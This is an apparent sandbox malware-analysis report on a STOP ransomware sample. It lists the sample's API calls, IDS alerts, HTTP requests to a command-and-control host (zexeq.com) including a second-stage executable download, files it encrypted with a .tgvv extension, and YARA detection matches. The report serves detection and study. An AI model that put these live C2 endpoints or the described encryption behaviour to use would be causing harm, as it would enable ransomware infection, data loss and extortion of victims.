              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 3_2_00F0FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,3_2_00F0FB98
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 4_2_00F10160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00F10160
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 4_2_00F0F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00F0F730
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 4_2_00F0FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,4_2_00F0FB98

              Networking

              Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49732 -> 199.59.242.150:80
              Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49732 -> 199.59.242.150:80
              Source: Traffic Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49734 -> 199.59.242.150:80
              Source: Malware configuration extractor URLs: http://zexeq.com/raud/get.php
              Source: Joe Sandbox View IP Address: 199.59.242.150
              Source: Joe Sandbox View IP Address: 104.21.65.24
              Source: Joe Sandbox View ASN Name: BODIS-NJUS
              Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 0_2_00F1CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00F1CF10
              Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
              Source: global traffic HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com
              Source: global traffic HTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com
              Source: global traffic HTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
              Source: global traffic HTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
              Source: unknown DNS traffic detected: queries for: api.2ip.ua
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2315011643.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2314479894.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2325329106.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2315771340.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2324133574.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-OQnsJqCOOl
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2315011643.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886601267.0000000003780000.00000004.00001000.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49729 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F922E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,0_2_00F922E0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crlJump to dropped file

              Spam, unwanted Advertisements and Ransom Demands

              Source: Yara matchFile source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 6956, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5776, type: MEMORYSTR
              Source: Yara matchFile source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: SAMPLE
              Source: Yara matchFile source: 4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000000.1661537232.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1638345295.0000000003681000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000000.1771858243.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.1641361042.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.1853102324.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1865795422.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1624016801.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1800981688.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 6828, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5644, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5104, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: DROPPED
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile moved: C:\Users\user\Desktop\ONBQCLYSPU.pngJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile deleted: C:\Users\user\Desktop\ONBQCLYSPU.pngJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile moved: C:\Users\user\Desktop\NWTVCDUMOB.mp3Jump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile deleted: C:\Users\user\Desktop\NWTVCDUMOB.mp3Jump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile moved: C:\Users\user\Desktop\KATAXZVCPS.jpgJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;hJump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_114932_b84-2220.log entropy: 7.99424089236Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903167889885.txt entropy: 7.9984808907Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml entropy: 7.99543515092Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml entropy: 7.99552721526Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99285644308Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99741583585Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99638531896Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\input\en-GB\userdict_v1.0809.dat entropy: 7.99113190564Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt entropy: 7.99840444964Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt entropy: 7.99834588968Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt entropy: 7.99873879207Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt entropy: 7.99859746422Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt entropy: 7.99861207687Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903214673664.txt entropy: 7.99801012151Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133521717815553933.txt entropy: 7.99828951398Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945529675005.txt entropy: 7.9983362719Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json entropy: 7.99878215669Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl entropy: 7.99744687963Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite entropy: 7.998521228Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99361302163Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99763913196Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1 entropy: 7.99839453678Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\webext.sc.lz4 entropy: 7.99828953962Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2 entropy: 7.99490975409Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2 entropy: 7.99790967889Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\0.0.filtertrie.intermediate.txt entropy: 7.99567322208Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\Apps.ft entropy: 7.99645604647Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\setup32.exe_Rules.xml entropy: 7.99856370608Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.99457191732Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.session entropy: 7.99072521137Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctAB5F.tmp.tgvv (copy) entropy: 7.99742901037Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctDB2E.tmp.tgvv (copy) entropy: 7.99711931997Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctE4A4.tmp.tgvv (copy) entropy: 7.9979150943Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctEA40.tmp.tgvv (copy) entropy: 7.99771315116Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctF411.tmp.tgvv (copy) entropy: 7.9977529049Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.tgvv (copy) entropy: 7.99285644308Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.tgvv (copy) entropy: 7.99741583585Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.tgvv (copy) entropy: 7.99638531896Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Microsoft\input\en-GB\userdict_v1.0809.dat.tgvv (copy) entropy: 7.99113190564Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\16.0\setup32.exe_Rules.xml.tgvv (copy) entropy: 7.99856370608Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.tgvv (copy) entropy: 7.99457191732Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.session.tgvv (copy) entropy: 7.99072521137Jump to dropped file

              System Summary

              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: SAMPLEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: SAMPLEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 3.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 3.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 3.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 6.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 6.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 4.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 3.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 4.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 0.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 0.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 2.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 2.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 6.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
